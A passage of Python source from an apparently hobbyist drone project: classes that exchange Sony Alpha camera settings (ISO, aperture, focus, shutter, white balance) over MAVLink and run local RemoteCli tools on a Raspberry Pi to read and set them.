print(' value: {} previous: {}'.format(self.set_sony_ex_pro,self.prev_sony_ex_pro))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_ex_pro,self.prev_sony_ex_pro,True
else:
return self.set_sony_ex_pro,self.prev_sony_ex_pro,False
def setVal_sony_focus_area(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_focus_area = self.set_sony_focus_area
self.set_sony_focus_area = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_focus_area(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_focus_area,self.prev_sony_focus_area))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_focus_area,self.prev_sony_focus_area,True
else:
return self.set_sony_focus_area,self.prev_sony_focus_area,False
def setVal_sony_focus(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_focus = self.set_sony_focus
self.set_sony_focus = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_focus(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_focus,self.prev_sony_focus))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_focus,self.prev_sony_focus,True
else:
return self.set_sony_focus,self.prev_sony_focus,False
def setVal_sony_shutter(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_shutter = self.set_sony_shutter
self.set_sony_shutter = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_shutter(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('value: {} previous: {}'.format(self.set_sony_shutter,self.prev_sony_shutter))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_shutter,self.prev_sony_shutter,True
else:
return self.set_sony_shutter,self.prev_sony_shutter,False
def setVal_sony_white_bal(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_white_bal = self.set_sony_white_bal
self.set_sony_white_bal = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_white_bal(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('value: {} previous: {}'.format(self.set_sony_white_bal,self.prev_sony_white_bal))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_white_bal,self.prev_sony_white_bal,True
else:
return self.set_sony_white_bal,self.prev_sony_white_bal,False
def setVal_sony_still_cap_mode(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_still_cap_mode = self.set_sony_still_cap_mode
self.set_sony_still_cap_mode = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_still_cap_mode(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('value: {} previous: {}'.format(self.set_sony_still_cap_mode,self.prev_sony_still_cap_mode))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_still_cap_mode,self.prev_sony_still_cap_mode,True
else:
return self.set_sony_still_cap_mode,self.prev_sony_still_cap_mode,False
def setMavIsoModeData( self, dataRcv ):
ret = False
ret = self.setVal_sony_iso(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavApertureData( self, dataRcv ):
ret = False
ret = self.setVal_sony_aperture(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavExProData( self, dataRcv ):
ret = False
ret = self.setVal_sony_ex_pro(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavFocusAreaData( self, dataRcv ):
ret = False
ret = self.setVal_sony_focus_area(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavFocusData( self, dataRcv ):
ret = False
ret = self.setVal_sony_focus(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavShutterData( self, dataRcv ):
ret = False
ret = self.setVal_sony_shutter(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavWhiteBalData( self, dataRcv ):
ret = False
ret = self.setVal_sony_white_bal(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
def setMavStillCapModeData( self, dataRcv ):
ret = False
ret = self.setVal_sony_still_cap_mode(dataRcv,self.STATE_MAV_WRITING,self.DONT_WRITE_PREV_DATA,5)
return ret
# ===============================================================================================================================
#
# Name : MemoryValueClass.py
# Desc : Global memory value class for use with cameras and mavlink
# Auth : AIR-obots Ai-Robots
#
# ===============================================================================================================================
import time
class memoryValue():
STATE_READY = 1
STATE_CAM_WRITING = 2
STATE_MAV_READING = 3
STATE_MAV_WRITING = 4
STATE_CAM_READING = 5
numberOfVals = 0
def __init__ (self, name = 'value_name_not_set', signal = None, prev = None, state = STATE_READY):
self.signal = signal # signal value
self.prev = prev # previous signal value
self.state = state # state of the value
self.nextpointer = None # pointer for chain if needed
self.name = name # name as a string
self.timestamp = 0 # timestamp
self.updateNeeded = False # update required
memoryValue.numberOfVals += 1 # global counter of the number of values
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
def get_value_counter(self):
print('%s: %d' % (self.name,memoryValue.numberOfVals))
return memoryValue.numberOfVals
def get_value_data(self,YourID,timeout):
timeCnt = 0
while (not (self.state == memoryValue.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print('Description: {}. value: {} previous: {}'.format(self.name, self.signal,self.prev))
self.state = memoryValue.STATE_READY
return self.name,self.signal,self.prev,True
else:
return self.name,self.signal,self.prev,False
def set_value(self,value,myId,timeout):
timeCnt = 0
while (not (self.state == memoryValue.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
self.prev = self.signal
self.signal = value
self.updateNeeded = True
self.state = memoryValue.STATE_READY
return True
else:
return False
def get_value_data_if_avail(self,YourID):
if (self.state == memoryValue.STATE_READY):
self.state = YourID
print('Description: {}. value: {}'.format(self.name, self.signal))
self.state = memoryValue.STATE_READY
return self.name,self.signal,self.prev,True
else:
return self.name,self.signal,self.prev,False
def set_update_flag( self, stateSent, myId ):
if (self.state == memoryValue.STATE_READY):
self.state = myId
self.updateNeeded = stateSent
self.state = memoryValue.STATE_READY
return True
else:
return False
if __name__ == '__main__':
initVal = 23
getName = "noName"
getValueforMAVSending = 0
getPrev = 0
SonyWhiteBalance = memoryValue('sonyWhiteBal',initVal)
FocusSetpoint = memoryValue('FocusSetpoint',initVal+6)
#
# example using in mavlink sender
#
mavSetPointVal = 99 #we_got_from_mavlink
Timeout = 20
if (FocusSetpoint.set_value(mavSetPointVal, memoryValue.STATE_MAV_WRITING, Timeout) == True):
# { value has been successfully set }
print("set the setpoint value focus")
#
# example to get the white balance setting from the cam to send over mavlink
#
getName, getValueforMAVSending, getPrev, myState = SonyWhiteBalance.get_value_data(memoryValue.STATE_MAV_READING, Timeout)
if (myState == True):
# now pack tha data
print("got data ok")
else:
# you got an error or timeout
print("data error")
#
# example using in mavlink sender
#
mavSetPointVal = 199 #we_got_from_mavlink
Timeout = 20
if (SonyWhiteBalance.set_value(mavSetPointVal, memoryValue.STATE_MAV_WRITING, Timeout) == True):
# { value has been successfully set }
print("set the setpoint value white balance")
#
# example to get the white balance setting from the cam to send over mavlink
#
getName, getValueforMAVSending, getPrev, myState = SonyWhiteBalance.get_value_data(memoryValue.STATE_MAV_READING, Timeout)
if (myState == True):
# now pack tha data
print("got data ok")
else:
# you got an error or timeout
print("data error")
#
# example to iterate without waiting for completion on the write to the value from elsewhere
#
myState = False
while not myState == True:
getName, getVal, getPrev, myState = FocusSetpoint.get_value_data_if_avail( memoryValue.STATE_CAM_READING )
if myState == True:
# now use this value and send to the camera
print("setpoint available")
else:
# do something else while watiting
print("setpoint being written by other task")
# what you do until it has arrived
time.sleep(0.1)
# what you do after
print("using the setpoint to change the camera")
#
# print the number of memory values
#
print(FocusSetpoint.get_value_counter())
print(SonyWhiteBalance.get_value_counter())
#
# Release the shared memory
#
del FocusSetpoint
del SonyWhiteBalance
# ===============================================================================================================================
#
# Name : NewSonyAlphaClass.py
# Desc : Communicate with new Sony Alpha Series of Camera
# Auth : AIR-obots Ai-Robots
#
# ===============================================================================================================================
import shlex, subprocess, pprint
class sonyAlphaNewCamera():
def __init__ (self, name = 'sonyAlphaCamClass'):
self.name = name # name as a string
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
def check_my_os( self ):
if ((sys.platform=='linux2') or (sys.platform=='linux')): return 1
elif sys.platform=='win32': return 2
else: return 3
def my_timestamp( self ):
if (self.check_my_os() == 1):
cmd = "date +%s"
return( int(os.popen(cmd).read()) )
def set_sony_iso( self, isoVal ):
# run the API command in the shell and look for the descriptor for the field
#
isoValArg=str(isoVal)
cmd='/home/pi/cams/SonyTEST32/set_iso/RemoteCli ' + isoValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "ISO_Mode"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('ISO_Format') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_aperture( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_aperture/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Aperture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Aperture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_ex_pro( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_ex_pro/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Exposure_Program_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Exposure_Program_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_focus( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_focus/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_focus_area( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_fa/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Area_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Area_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_shutter( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_shutter/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Shutter_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Shutter_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_white_bal( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_wb/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "White_Bal_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('White_Bal_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_still_cap_mode( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/still_cap_mode/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Still_Capture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Still_Capture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_white_balance( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/white_bal/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "White_Bal_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('White_Bal_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_ex_pro( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/exp_pro_mode/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Exposure_Program_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Exposure_Program_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_aperture( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_aperture/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Aperture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Aperture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_focus( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_focus/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def set_sony_still_cap( self, Val ):
# run the API command in the shell and look for the descriptor for the field
#
ValArg=str(Val)
cmd='/home/pi/cams/SonyTEST32/set_still_cap/RemoteCli ' + ValArg
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Still_Capture_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Still_Capture_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_focus_area( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_focus_dist/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Focus_Area_Val"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Focus_Area_Val') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_iso( self ):
# run the API command in the shell and look for the descriptor for the field
#
cmd='/home/pi/cams/SonyTEST32/get_iso/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "ISO_Format"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('ISO_Format') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
def get_sony_shut_spd( self ):
# run the API command in the shell and look for the descriptor for the field
#
